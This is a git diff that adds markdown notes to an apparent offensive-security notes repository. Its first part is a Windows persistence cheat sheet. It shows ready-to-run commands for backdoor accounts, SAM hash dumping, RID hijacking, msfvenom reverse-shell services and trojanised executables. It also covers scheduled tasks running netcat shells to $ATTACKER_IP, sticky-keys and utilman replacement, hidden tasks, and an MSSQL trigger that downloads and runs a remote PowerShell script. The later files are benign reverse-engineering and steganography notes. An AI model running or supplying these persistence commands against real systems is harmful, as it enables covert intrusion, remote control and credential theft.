`net localgroup administrators /add` +* Check `net localgroup Administrator` + +### More stealthy + +* Backup Operator group is more stealthy, no admin by r/w on files +```sh +net localgroup "Backup Operators" /add +net localgroup "Remote Management Users" /add +``` +* The following two groups are assigned through membership of `Backup Operators` + * SeBackupPrivilege, read files + * SeRestorePrivilege, write files + +* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via +```sh +reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1 +``` +* Afterwards, check if `Backup Operators` is enabled via `whoami /groups` +* Backup `SAM` and `SYSTEM` via +```sh +reg save hklm\system system.bak +reg save hklm\sam sam.bak +download system.bak +download sam.bak +secretsdump.py -sam sam.bak -system system.bak LOCAL +``` +* Pass-the-hash via evil-winrm + +### secedit + +* Get r/w on files through editing a config file +* Export secedit and open it +```sh +secedit /export /cfg config.inf +``` +* Add user to the groups +```sh +SeBackupPrivilege = [...], +SeRestorePrivilege = [...], +``` +* Convert the file +```sh +secedit /import /cfg config.inf /db config.sdb +secedit /configure /db config.sdb /cfg config.infk +``` +* Add the user to the RDP group via net localgroup like before or do +```sh +Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI +``` +* Add & Click user -> Full Control(All Operations) +* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before + +### Relative ID (RID) + +* UID like in linux + * Administrator has `RID = 500` + * Other interactive users `RID >= 1000` +* Get RIDs +```sh + wmic useraccount get name,sid +``` +* Assign `500` to regular user +```sh + PsExec64.exe -i -s regedit +``` +* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>` +* Search for RID value as hexadecimal value +* Open the key called `F` and change effective RID at position `0x30` +* Insert LE hex of `0d500`, which is `f401` + +## Add to registry + +* Execute on user logon via +```sh +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f +``` + +## Add a Service + +### Meterpreter + +* Inside meterpreter `load powershell` and `powershell_shell` +```sh +New-Service -Name "" -BinaryPathName "" -Description "" -StartupType "Boot" +``` + +### Powershell + +* Start a service automatically +```sh +sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto +sc.exe start SteamUpdater +``` + +* Use a service PE instead +```sh +msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe +``` + +* Modify an existing service + * Enumerate all the services +```sh +sc.exe query state=all +``` + * Info about a specific service, start type should be automatic, service start name should be target user +```sh +sc.exe qc +``` + * Reconfigure +```sh +sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem" +sc.exe start FoundService +``` + +## Add Scheduled Task + +```sh +$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe +$B = New-ScheduledTaskTrigger -AtLogOn +$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest +$D = New-ScheduledTaskSettingsSet +$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D +Register-ScheduledTask ReverseShell -InputObject $E +``` + +* Alternatively via `schtasks` +```sh +schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM +``` + * Check task +```sh +schtasks /query /tn SteamUpdater +``` + +* Deleting Security Descriptor of a task to make it invisible. Delete the following key +```sh +HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\\SD +``` + +## File Backdoor + +### Mimic PE +```sh +msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe +``` + +### Reference Script +* Recycle shortcut of an app to reference a reverse shell script + * Right click -> `Properties` -> `Target` +* Reference the the script `certainlynobackdoor.ps1` via +```sh +powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1 +``` +* Content of the script `certainlynobackdoor.ps1` +```sh +Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT" +C:\Windows\System32\calc.exe +``` + +### File Association + +* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\` +* Choose a class and `/shell/open/command` contains the file to be opened as the first argument `%1` +* Chang the argument to a shell script and pass the arg through it +```sh +Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT" +C:\Windows\system32\NOTEPAD.EXE $args[0] +``` +* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1` + + +## Persistence via Logon + +### Startup directories +* Users' Startup directory under +```sh +C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup +``` + +* Startup directory for all users, put the reverse shell here +```sh +C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp +``` + +### Registry Keys + +* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` +* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` +* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run` +* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce` + +* Create `Expandable String Value` under any of this keys with the value of the reverse shell path + + +* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done + * Either `shell` or `Userinit` can be appended with a comma separated command + +### Logon Scripts + +* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts + +* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload + + +## RDP or Login Screen + +### Sticky Keys +* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed +* Take ownership of the binary via +```sh +takeown /f c:\Windows\System32\sethc.exe +icacls C:\Windows\System32\sethc.exe /grant Administrator:F +``` +* Overwrite with `cmd.exe` +```sh +copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe +``` + +### Utilman + +* Ease of access button is clickable at the login screen, it is executed with system privileges +* Take ownership and overwrite with `cmd.exe` +```sh +takeown /f c:\Windows\System32\utilman.exe +icacls C:\Windows\System32\utilman.exe /grant Administrator:F +copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe +``` + +## Web Shell + +* Default user is `iis apppool\defaultapppool` +* Has `SeImpersonatePrivilege` + +* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx) +* Move shell to `C:\inetpub\wwwroot` on target +* Get the shell via `http://$TARGET_IP/shell.aspx` + +## MSSQL + +* Triggers bind actions such as INSERTs + +* Open Microsoft SQL Server Management Studio + * Choose windows auth + * `New Query` + * Enable Advance Options via +```sh +sp_configure 'Show Advanced Options',1; +RECONFIGURE; +GO + +sp_configure 'xp_cmdshell',1; +RECONFIGURE; +GO +``` + * Grant privileges to all users +```sh +USE master +GRANT IMPERSONATE ON LOGIN::sa to [Public]; +``` + + * Change to DB +```sh +USE +``` + + * Create trigger +```sh +CREATE TRIGGER [sql_backdoor] +ON HRDB.dbo.Employees +FOR INSERT AS + +EXECUTE AS LOGIN = 'sa' +EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"'; +``` + +* Trigger the trigger by visiting the site which triggers the trigger through a db call + diff --git a/Persistence/wmi.md b/Persistence/wmi.md new file mode 100644 index 0000000..6d09ef1 --- /dev/null +++ b/Persistence/wmi.md @@ -0,0 +1,3 @@ +# WMI Backdoor + +* [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git) diff --git a/Reverse Engineering/Android.md b/Reverse Engineering/Android.md new file mode 100644 index 0000000..1fbc8ff --- /dev/null +++ b/Reverse Engineering/Android.md @@ -0,0 +1,81 @@ +# Misc + +* `Dalvik` is the JVM of Android + +## SMALI + +* `SMALI` is the byte code derived from Java. +* Types +``` +V void +Z boolean +B byte +S short +C char +F float +I int +J long +D double +[ array +``` + +### Registers +* Registers are 32 bits +* Type long and double use two registers 32+32=64 bits +* `.registers`, total number of regs in method +* `.locals`, non parameter regs in method +* Arguments of a method are put into registers from highest to lowest. +* The object itself is a parameter to its method. + +* Register naming schemes are +* Normal local register are name v0, v1, v2 ... +* Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers. + + +## APK Structure + +* `AndroidManifest.xml`, binary XML +* `classes.dex`, app code compilation as dex +* `resource.arsc`, precompiled resources in XML +* `res`, resource dir +* `assets` app assets +* `lib`, libraries +* `META/INF`, contains metadata file `MANIFEST.MF` and signature of the apk. + +## Tools + +* `jadx -d ` as a decompiler +* dex2jar to convert apk to jar +```sh +d2j-dex2jar.sh /path/application.apk +``` +* Dex to smali with `d2j-dex2smali` +* jd-gui as decompiler +* `apktool` smali source from apk + +* [Firebase scanner](https://github.com/shivsahni/FireBaseScanner.git) +* [Mara reversing framework](https://github.com/xtiankisutsa/MARA_Framework.git) +* [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF.git) +* Proguard deobfuscates code +* [PID Cat log reader](https://github.com/JakeWharton/pidcat.git) +* Burpsuite listener on Android emulator +* [Drozer](https://github.com/FSecureLABS/drozer) +```sh +adb forward tcp:31415 tcp:31415 +drozer console connect +run app.package.list -> see all the packages installed +run app.package.info -a -> view package information. +run app.package.attacksurface package_name +run app.activity.info -f package_name +run app.activity.start --component package name component_name +``` +```sh +run app.provider.info -a package_name +run scanner.provider.finduris -a package_name +run app.provider.query uri +run app.provider.update uri --selection conditions selection_arg column data +run scanner.provider.sqltables -a package_name +run scanner.provider.injection -a package_name +run scanner.provider.traversal -a package_name +``` + diff --git a/Reverse Engineering/Deobfuscation.md b/Reverse Engineering/Deobfuscation.md new file mode 100644 index 0000000..e5ee271 --- /dev/null +++ b/Reverse Engineering/Deobfuscation.md @@ -0,0 +1,97 @@ +# Deobfuscation + +## Principles of Obfuscation + +* Software obfuscation may be divided into a theoretical layered approach, done by [Hui Xu et. al](https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-020-00049-3.pdf) + +* These layers and what's obfuscated are: + * __Code Element__ + * Layout + * Controls + * Data + * Classes + * Methods + * __Software Component__ + * __Inter Component__ + * Library calls + * Used Resources + * __Application__ + * DRM System + * Neural Networks + +## Evade Statical Rules + +* Critical data is obfuscated by the __Code Element__ layer which contains the following methods of obfuscation + * __Array Transformation__ + * __Data Encoding__ + * __Data Procedurization__ + * __Data Splitting & Merging__ + +### Splitting & Merging of Strings + +* Breaking signature by modifying data distribution inside the code +* This may be done by modifying strings and functions through following measures + +* __Joining__ +```python +"CAFFEE" + "BABE" +``` + +* __Reordering__ +```python +a = "BABE" +b = "CAFFEE" +f"{b}{a}" +``` + +* __Whitespaces of functions which are not interpreted__ +```c +int main ( void ) { + printf ( "The answer is %d", 42 ) ; +} +``` + +* __Adding ticks which are not interpreted__ + +* __Change `uPpER aNd loWeRcAsE oF cHaRaCtErS iN tHe StRinG`__ + +### Adding Unnecessary Instructions + +* Obfuscation of layout and controls inside the code +* __Junk Stubs__ +* __Separation of Related Code__ +* __Stripping Redundant Symbols__ +* __Meaningless Identifiers__ +* __Converting Explicit to Implicit Instructions__ +* __Dispatcher Based Controls Executed During Runtime__ +* __Probabilistic Control Flows__ +* __Bogus Control Flows__ + + +### Control Flow + +* Changing or adding to the flow of the code through change of conditions +* Changes may be set to arbitrary code segments by __Opaque Predicates__ +* An __Opaque Predicate__ is a control path and value known by the obfuscater and hard to find out by the reverse engineer + +### Protecting Data + +* Stripping and protecting + * __Code Structure__ + * __Object names__ + * __File & Compilation Properties__ + +* To strip symbols +```sh +strip --strip-all +``` + +* Check via +```sh +nm +``` + +## Usage + +* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator +* In case of dotnet: __Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well__ diff --git a/Reverse Engineering/Dynamic Linked Libraries.md b/Reverse Engineering/Dynamic Linked Libraries.md new file mode 100644 index 0000000..8899c40 --- /dev/null +++ b/Reverse Engineering/Dynamic Linked Libraries.md @@ -0,0 +1,9 @@ +# DLL Reversing + +* Start DLL on its own with the help a wrapper +```C# +HMODULE dll = LoadLibraryA("DLL.DLL"); +typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y) +Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName"); +Add(1, 2); +``` diff --git a/Reverse Engineering/Firmware.md b/Reverse Engineering/Firmware.md new file mode 100644 index 0000000..faaee1d --- /dev/null +++ b/Reverse Engineering/Firmware.md @@ -0,0 +1,35 @@ +# Reversing Firmware + +## Tools +* binwalk +* unlzma +* tar +* [fat](https://github.com/attify/firmware-analysis-toolkit.git) + * Create usable environment and start firmware inside it + ```sh + ./fat.py + ``` +* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git` + +## Usage +* Check image via `strings` +* Check CRC via `cksum -a crc ` +* Use `binwalk` to extract. There are to methods + * `-e` extract by offset + * `--dd=".*"` by file extension + +### Mount JFFS2 File +* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10` +```sh +rm -rf /dev/mtdblock0 +mknod /dev/mtdblock0 b 31 0 +mkdir /mnt/jffs2 +modprobe jffs2 +modprobe mtdram +modprobe mtdblock +dd if= of=/dev/mtdblock0 +mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/ +``` + +## Tips & Tricks +* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php) diff --git a/Reverse Engineering/Function Mangling.md b/Reverse Engineering/Function Mangling.md new file mode 100644 index 0000000..d44db63 --- /dev/null +++ b/Reverse Engineering/Function Mangling.md @@ -0,0 +1,4 @@ +# Function Decoration + +* Done to imported functions in order to do interpositioning and identify the variants of the function. +* [name mangling](https://en.wikipedia.org/wiki/Name_mangling) diff --git a/Reverse Engineering/Krakatau.md b/Reverse Engineering/Krakatau.md new file mode 100644 index 0000000..c998327 --- /dev/null +++ b/Reverse Engineering/Krakatau.md @@ -0,0 +1,17 @@ +# Krakatau + +## Usage +* Get bytecode from `jar` file +```sh +krakatau-disassemble -r file.jar -out dissassemble.zip +``` +* Generate bytecode +```sh +krakatau-assemble -out result.jar -r dissassembled/ +``` +* Do changes to the bytecode +* Compile jar file +```sh +java -cp result.jar +``` + diff --git a/Reverse Engineering/Portable Executable.md b/Reverse Engineering/Portable Executable.md new file mode 100644 index 0000000..7f3d3a7 --- /dev/null +++ b/Reverse Engineering/Portable Executable.md @@ -0,0 +1,33 @@ +# Portable Executable + +* [Windows PE doc](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) +* An executable binary in the windows world +The file format consists of + * PE Header + * Data Sections + +## Data Section + +The data section consists of +* __.text__, program code +* __.data__, initialized variables +* __.bss__, unanitialized variables +* __.edata__, exportable objects and related table info +* __.idata__, imported objects and related table info +* __.reloc__, image relocation info +* __.rsrc__, links external resources, e.g. icons, images, manifests + +## Starting a PE + +If a process starts, the PE is read in the following order +1. Header sections + * File signatue is __MZ__, and magic number are read + * Architecture of the platform + * timestamp +2. Section table details is parsed +3. Content is mapped into memory based on + * Entry point address and offset of ImageBase + * Relative Virtual Address (RVA), addresses related to Imagebase +4. Libraries and imports are loaded +5. Entrypoint address of the main function is run + diff --git a/Reverse Engineering/References.md b/Reverse Engineering/References.md new file mode 100644 index 0000000..4af98d5 --- /dev/null +++ b/Reverse Engineering/References.md @@ -0,0 +1,7 @@ +# Reverse Engineering References + + +## Debugger + +[scdbg](https://github.com/dzzie/SCDBG.git) + diff --git a/Reverse Engineering/Scada.md b/Reverse Engineering/Scada.md new file mode 100644 index 0000000..b36c598 --- /dev/null +++ b/Reverse Engineering/Scada.md @@ -0,0 +1,35 @@ +# Supervisory Control and Data Acquisition (SCADA) + +* SCADA works as an aggregatio of the following systems + * __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices. + * __Remote Terminal Unit (RTU)__, use for wide area telemetry + * __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input. + * __Communication network__ + +* Security is no first class citizen + +## Modbus + +* Developed by Modicon +* Master/Slave, latter has an 8 bit address. +* RS-485 Connector +* Data registers 16 bit + * Input register, 16 bit ro + * Hold register, rw + * Coil register, 1 bit rw + * Discrete register, 1bit ro + +### Function Codes +* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html) +* RTU request inside of TCP segments, port 502 + +* 1 __Read Coil__ +* 2 __Read Discrete Input__ +* 3 __Read Holding Registers__ +* 4 __Read Input Registers__ +* 5 __Write Single Coil__ +* 6 __Write Single Holding Register__ +* 15 __Write Multiple Coils__ +* 16 __Write Multiple Holding Registers__ + + diff --git a/Steganography/OutGuess.md b/Steganography/OutGuess.md new file mode 100644 index 0000000..c056ec3 --- /dev/null +++ b/Steganography/OutGuess.md @@ -0,0 +1,2 @@ +# Outguess +`man outguess` diff --git a/Steganography/References.md b/Steganography/References.md new file mode 100644 index 0000000..6f60417 --- /dev/null +++ b/Steganography/References.md @@ -0,0 +1,10 @@ +# Steganography Tools + +[Stego-Toolkit](https://github.com/DominicBreuker/stego-toolkit.git) +[OutGuess](https://github.com/resurrecting-open-source-projects/outguess) +[Remnux Docs](https://docs.remnux.org/) +[Steghide](http://steghide.sourceforge.net/) +[Stegbrute](https://github.com/R4yGM/stegbrute) +[stegoVeritas](https://github.com/bannsec/stegoVeritas) +[zsteg](https://github.com/zed-0xff/zsteg) + diff --git a/Steganography/Remnux.md b/Steganography/Remnux.md new file mode 100644 index 0000000..454db33 --- /dev/null +++ b/Steganography/Remnux.md @@ -0,0 +1,24 @@ +# ReMnux +* [Documentation](https://docs.remnux.org/) + +## Tools + +### Peepdf +* Extracting JS from PDF using config file into `js_from_pdf.js` +```sh +echo 'extract js > js_from_pdf.js' > extract_js.conf +peepdf -s extract_js.conf +``` + +### vmonkey +* Detects malicious VBasic code in documents. +```sh +vmonkey +``` + +### Packaged Binaries +* Can be identified via entropy or loaded libs + * The count of libs loaded by a packaged bin is very low. A packaged PE could load `GetProcAddress` or `LoadLibrary`. + * [PEiD](https://www.aldeid.com/wiki/PEiD) detects most packers. + * File [Entropy](https://fsec404.github.io/blog/Shanon-entropy/) of a packaged is high. + diff --git a/Steganography/Stegbrute.md b/Steganography/Stegbrute.md new file mode 100644 index 0000000..08c119e --- /dev/null +++ b/Steganography/Stegbrute.md @@ -0,0 +1,9 @@ +# Stegbrute +Bruteforce stego jpegs with a password. + +* install via `cargo install stegbrute` + +## Usage +```sh +stegbrute -f -w +``` diff --git a/Steganography/Steghide.md b/Steganography/Steghide.md new file mode 100644 index 0000000..91ba361 --- /dev/null +++ b/Steganography/Steghide.md @@ -0,0 +1,8 @@ +# Steghide + +* JPGs only + +* Example +```sh +steghide extract -sf jpeg1.jpeg +``` diff --git a/Steganography/StegoScripts/xor_key_file.py b/Steganography/StegoScripts/xor_key_file.py new file mode 100644 index 0000000..c79d223 --- /dev/null +++ b/Steganography/StegoScripts/xor_key_file.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +def xor(data, key): + keylen = len(key) + return bytearray(( + (data[i] ^ key[i % keylen]) for i in range(0,len(data)) + )) + + +if __name__ == "__main__": + data = bytearray(open('topsecret.txt', 'rb').read()) + key = b'key' + res = xor(data, key) + print(res.decode()) + diff --git a/Steganography/Stegoveritas.md b/Steganography/Stegoveritas.md new file mode 100644 index 0000000..eb09a3f --- /dev/null +++ b/Steganography/Stegoveritas.md @@ -0,0 +1,3 @@ +# Stegoveritas + +* Install via `pip install stegoveritas` and `stegoveritas_install_deps` diff --git a/Steganography/Zsteg.md b/Steganography/Zsteg.md new file mode 100644 index 0000000..7a071b9 --- /dev/null +++ b/Steganography/Zsteg.md @@ -0,0 +1,8 @@ +# zsteg + +* PNGs, BMPs + +* Example +```sh +zsteg png1.png --strings all +```